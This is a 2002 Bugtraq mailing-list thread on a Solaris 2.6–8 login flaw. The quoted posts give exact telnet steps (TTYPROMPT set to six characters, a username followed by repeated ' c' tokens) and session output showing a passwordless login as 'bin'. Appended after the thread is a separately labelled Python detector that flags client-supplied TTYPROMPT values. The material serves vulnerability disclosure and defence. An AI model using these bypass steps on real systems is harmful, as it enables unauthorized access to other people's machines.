Re: Solaris 2.6, 7, 8

From: Roy Kidder (rkidder@corecomm.com)
Date: 10/03/02


From: Roy Kidder <rkidder@corecomm.com>
To: Bugtraq <bugtraq@securityfocus.com>
Date: 03 Oct 2002 15:03:13 -0400

Works like a champ on Solaris 2.6/Sparc:

---------- begin ----------

~ $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

SunOS 5.6

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: Thu Oct 3 14:49:33 from localhost
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have new mail.
bin@ovcle$ uname -a
SunOS ovcle 5.6 Generic_105181-14 sun4u sparc SUNW,Ultra-4
bin@ovcle$ who am i
bin pts/6 Oct 3 15:05 (localhost)

---------- end ----------

On Wed, 2002-10-02 at 13:23, Ramon Kagan wrote:
> Sorry but I can't reproduce this on a Solaris 7 machine.
>
> sunlight.ccs% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
>
>
> SunOS 5.7
>
> login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
> Login incorrect
>
>
> As you can see I get a request for a username/password.
>
> Ramon Kagan
> York University, Computing and Network Services
> Unix Team - Intermediate System Administrator
> (416)736-2100 #20263
> rkagan@yorku.ca
>
> -------------------------------------
> I have not failed. I have just
> found 10,000 ways that don't work.
> - Thomas Edison
> -------------------------------------
>
> On Wed, 2 Oct 2002, Jonathan S wrote:
>
> > Hello,
> >
> > Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> > environment variable TTYPROMPT. This vulnerability has already been
> > reported to BugTraq and a patch has been released by Sun.
> > However, a very simple exploit, which does not require any code to be
> > compiled by an attacker, exists. The exploit requires the attacker to
> > simply define the environment variable TTYPROMPT to a 6 character string,
> > inside telnet. I believe this overflows an integer inside login, which
> > specifies whether or not the user has been authenticated (just a guess).
> > Once connected to the remote host, you must type the username, followed by
> > 64 " c"s, and a literal "\n". You will then be logged in as the user
> > without any password authentication. This should work with any account
> > except root (unless remote root login is allowed).
> >
> > Example:
> >
> > coma% telnet
> > telnet> environ define TTYPROMPT abcdef
> > telnet> o localhost
> >
> > SunOS 5.8
> >
> > bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> > Last login: whenever
> > $ whoami
> > bin
> >
> > Jonathan Stuart
> > Network Security Engineer
> > Computer Consulting Partners, Ltd.
> > E-mail: jons@ccpartnersltd.com
> >
> >
>

-- 
===================================================
Roy Kidder
Data Network Engineer
CoreComm
---------------------------------------------------
"...these products' frequent failures are 
legitimized by ubiquitous acquiescence." 
     -- Doc Searls on Microsoft products.
===================================================
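An added example, not part of the thread or of Sun's code: the `environ define TTYPROMPT abcdef` step above goes over the wire as a telnet NEW-ENVIRON suboption (RFC 1572), so a defender watching telnet traffic or a telnetd trace can decode that suboption and alert on any client-supplied TTYPROMPT, which login(1) should never accept from the remote end. Option codes come from RFC 854 and RFC 1572; the sample bytes are constructed.

```python
# Added example (not from the thread): decode telnet NEW-ENVIRON (RFC 1572) and flag TTYPROMPT.
IAC, SB, SE = 255, 250, 240            # telnet command bytes (RFC 854)
NEW_ENVIRON = 39                       # option code (RFC 1572)
IS, SEND, INFO = 0, 1, 2               # suboption commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3  # field markers inside IS/INFO

def parse_new_environ(data: bytes) -> dict:
    """Return {name: value} for every variable sent in IS/INFO suboptions.
    A name with no VALUE field maps to None (RFC 1572: variable undefined)."""
    env, pos = {}, 0
    while True:
        start = data.find(bytes([IAC, SB, NEW_ENVIRON]), pos)
        if start < 0 or start + 3 >= len(data):
            return env
        cmd, i, fields = data[start + 3], start + 4, []
        while i < len(data):
            b = data[i]
            if b == IAC and i + 1 < len(data) and data[i + 1] == SE:
                i += 2
                break                      # IAC SE ends the suboption
            if b == IAC:                   # IAC IAC is an escaped 0xFF data byte
                i += 1
            elif b == ESC and i + 1 < len(data):
                b, i = data[i + 1], i + 1  # ESC escapes a literal marker byte
            elif b in (VAR, USERVAR, VALUE):
                fields.append((b, bytearray()))
                i += 1
                continue
            if fields:
                fields[-1][1].append(b)
            i += 1
        pos = i
        if cmd not in (IS, INFO):          # SEND carries no values
            continue
        name = None
        for kind, raw in fields:
            text = raw.decode("ascii", "replace")
            if kind in (VAR, USERVAR):
                name, env[text] = text, None
            elif name is not None:         # VALUE belongs to the preceding name
                env[name] = text

def ttyprompt_alert(env: dict):
    """Any remote TTYPROMPT is worth an alert, whatever its length or value."""
    val = env.get("TTYPROMPT")
    return None if val is None else f"client-supplied TTYPROMPT={val!r}"

# Constructed sample: what the client sends after "environ define TTYPROMPT abcdef"
SAMPLE = (bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER" + bytes([VALUE]) + b"bin"
          + bytes([USERVAR]) + b"TTYPROMPT" + bytes([VALUE]) + b"abcdef" + bytes([IAC, SE]))
```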
